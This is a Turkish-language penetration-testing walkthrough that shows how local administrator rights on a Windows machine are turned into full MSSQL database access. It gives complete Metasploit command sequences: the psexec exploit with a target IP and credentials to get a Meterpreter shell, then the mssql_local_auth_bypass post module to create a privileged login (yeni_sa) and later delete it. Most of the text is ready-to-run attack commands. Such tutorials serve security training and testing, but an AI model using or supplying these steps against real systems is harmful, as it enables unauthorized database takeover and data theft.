Mevcut durumda, yerel yönetici hakkı elde edilen bilgisayardaki MSSQL uygulamasında kimlik doğrulaması olarak Mixed Mod etkindir.
Ele geçirilen bilgisayarda, yerel yönetici haklarına sahip olunmuştur.
whoami
net user hacked
Ancak yerel yönetici hakları ile veritabanlarına erişim sağlanamamaktadır.
MSF psexec gibi bir modül kullanılarak veya sosyal mühendislik yöntemleri kullanılarak yerel yönetici hakları ile Meterpreter kabuğu elde edilebilir.
use exploit/windows/smb/psexec
set RHOST 172.22.71.247
set SMBUSER Hacked
set SMBPASS Hh123456
exploit
getuid
Elde edilen Meterpreter oturumunda, MSF mssql_local_auth_bypass post modülü ile veritabanında tam yetkiye sahip olunabilir. MSF mssql_local_auth_bypass post modülü aşağıdaki gibidir:
background
search mssql_local_auth_bypass
use post/windows/manage/mssql_local_auth_bypass
show options
Post modül aşağıdaki gibi ayarlanabilir ve çalıştırılabilir:
set DB_USERNAME yeni_sa
set DB_PASSWORD yeni_sa_Mssql123
set SESSION 1
run
Oluşturulan yeni kullanıcı hesabı ile MSSQL üzerinde oturum açılabilmiştir.
Veritabanında işlemler gerçekleştirildikten sonra oluşturulan hesabın (yeni_sa) silinmesi gerekmektedir. Silme işlemi Microsoft SQL Server Management Studio konsolundan gerçekleştirilebileceği gibi, MSF mssql_local_auth_bypass post exploitation modülündeki REMOVE_LOGIN seçeneğini “true” olarak değiştirilmesiyle aşağıdaki gibi de gerçekleştirilebilir:
use post/windows/manage/mssql_local_auth_bypass
set DB_USERNAME yeni_sa
set DB_PASSWORD RastgeleParola
set SESSION 1
set REMOVE_LOGIN true
run